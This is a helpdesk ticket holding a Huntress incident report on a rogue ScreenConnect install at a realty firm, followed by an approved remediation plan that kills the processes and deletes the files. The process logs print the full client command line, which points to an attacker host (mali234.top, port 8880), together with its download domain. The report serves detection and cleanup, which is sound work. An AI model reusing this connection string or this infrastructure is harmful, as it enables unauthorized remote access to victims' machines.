← Customer 14024013

#32235 [Huntress Detection] CRITICAL - ISOLATED - Incident on FRP-PatXPS (Farran Realty Partners)

Resolved Created Feb 5, 2025, 3:43 PM Resolved Feb 5, 2025, 5:56 PM
Huntress (internal) Feb 5, 2025, 3:43 PM 
*** The Huntress Agent has been tasked to isolate this host from the rest of the network in order to prevent the incident from spreading to other hosts. ***

Host: FRP-PatXPS - https://artichoke.huntress.io/org/143732/agents/3029886
Organization: Farran Realty Partners
Tags: None
Security Products: Windows Defender

Incident Report: https://artichoke.huntress.io/org/143732/infection_reports/1404993
Severity: Critical

Investigative Summary
---------------------
[WARNING]
Please review this incident report to understand what was identified before remediating. There may be unknown malicious processes, files, or other changes made to the host that remain undetected. Restoring from a known good backup or clean OS install is the only way to ensure a complete host-level remediation. While the Assisted Remediation service is an option, it will only remove specific items documented in this report.

Huntress detected the following:
- Rogue ScreenConnect Install : Huntress has been tracking a number of malicious threat actors convincing users via email into running malicious ScreenConnect (ConnectWise Control) installers that give the threat actor remote access to the host.

On '2025-02-05 15:31:11 UTC' Huntress detected a rogue ScreenConnect instance on the host 'FRP-PatXPS' installed by the user 'jpcorrick'. This screenconnect was installed from https://www.fihelp[.]top
This ScreenConnect agent is configured to communicate with the following domain which does not appear to be the standard management site used by this organization:
- mali234[.]top

Remediation Instructions
------------------------
To remediate, perform the actions below:
- Remove the "c:\users\jpcorrick\appdata\local\apps\2.0\v5xod0ol.z9v\025691br.4vt\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\screenconnect.windowsclient.exe" file and ensure it is not recreated.

Processes
---------
Start Time: 2025-02-05 15:31:09 UTC
Command: "C:\Users\jpcorrick\Downloads\support.Client.exe"
Executable: C:\Users\jpcorrick\Downloads\support.Client.exe
Process ID: c71fcd74-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Program Files\Google\Chrome\Application\chrome.exe
User: jpcorrick

Start Time: 2025-02-05 15:31:32 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcdb8-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

Start Time: 2025-02-05 15:30:43 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcd5c-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

Start Time: 2025-02-05 15:31:09 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcd78-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

Start Time: 2025-02-05 15:31:30 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcdae-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

Start Time: 2025-02-05 15:30:37 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcd56-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

Start Time: 2025-02-05 15:31:32 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
Process ID: c71fcdb6-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
User: jpcorrick

Start Time: 2025-02-05 15:31:24 UTC
Command: "C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mali234.top&p=8880&s=7c993e62-baac-4106-b635-6cfcb4cc9d14&k=BgIAAACkAABSU0ExAAgAAAEAAQChfRI38gGgl4WosbHlClYZ036SqXDZ1nv8oamja1gQwKrzvvVAnvIR1j8NSyOTKRiLKDgsRnEZcWNZe9F3WJs9Gx5IA0wEepo1ZQPejUY9HHOoOaArjIY%2bzoIWgx8mM8T1mM25Y8%2fNmV%2flrUlALGQf3bB%2bKb7KvGrHEPE9Ig882IUXPvO5mTSR7fXYXQd2uwUOpol0UYpEEAxXEHwkMWqyb4sBovWeAAf2IxBDrhjVPw67axBIZbqnoiZN6Gl1ZcVuqBUf9BQCFSxNco37zvZx0yJXaXWPfRnCuy%2bbNEM7m76RBnte%2f5iKJQz2QjQWG33HR6vPsbYcXwUshjaJ47S4&r=&i=harry2" "1"
Executable: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.ClientService.exe
Process ID: c71fcd8a-e344-11ef-9d5f-14857ff15a44
Parent Process: C:\Users\jpcorrick\AppData\Local\Apps\2.0\V5XOD0OL.Z9V\025691BR.4VT\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\ScreenConnect.WindowsClient.exe
User: jpcorrick

-------------------------
Thanks again for trusting Huntress and please don't hesitate to reach out to [email protected] if you have any questions.
Artichoke Support - Peet (internal) Feb 5, 2025, 4:43 PM 
The following remediation plan was approved by [email protected]:

Assisted Remediations:
Kill Process: ["Path: C:\\Users\\jpcorrick\\Downloads\\support.Client.exe", "Pid: 23236"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 22888"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 20544"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 18724"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 15544"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 4412"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.WindowsClient.exe", "Pid: 26516"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.ClientService.exe", "Pid: 21252"]
Delete File: ["Path: c:\\users\\jpcorrick\\appdata\\local\\apps\\2.0\\v5xod0ol.z9v\\025691br.4vt\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\screenconnect.windowsclient.exe"]
Kill Process: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\ScreenConnect.WindowsClient.exe", "Pid: 26516"]
Delete File: ["Path: C:\\Users\\jpcorrick\\Downloads\\support.Client.exe"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\Client.Override.en-US.resources"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\Client.Override.resources"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\Client.en-US.resources"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\Client.resources"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Client.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Client.dll"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Client.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.ClientService.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.ClientService.dll"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.ClientService.exe"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.ClientService.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Core.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Core.dll"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Core.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Windows.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Windows.dll"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.Windows.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsBackstageShell.exe"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsBackstageShell.exe.config"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.exe"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.exe.cdf-ms"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.exe.config"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.exe.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsClient.manifest"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsFileManager.exe"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\ScreenConnect.WindowsFileManager.exe.config"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\app.config"]
Delete File: ["Path: C:\\Users\\jpcorrick\\AppData\\Local\\Apps\\2.0\\V5XOD0OL.Z9V\\025691BR.4VT\\scre..tion_25b0fbb6ef7eb094_0018.0003_804b30f232b53ee1\\\\user.config"]
Reboot the Host: ["Remediation: A reboot is required to complete the remediation plan"]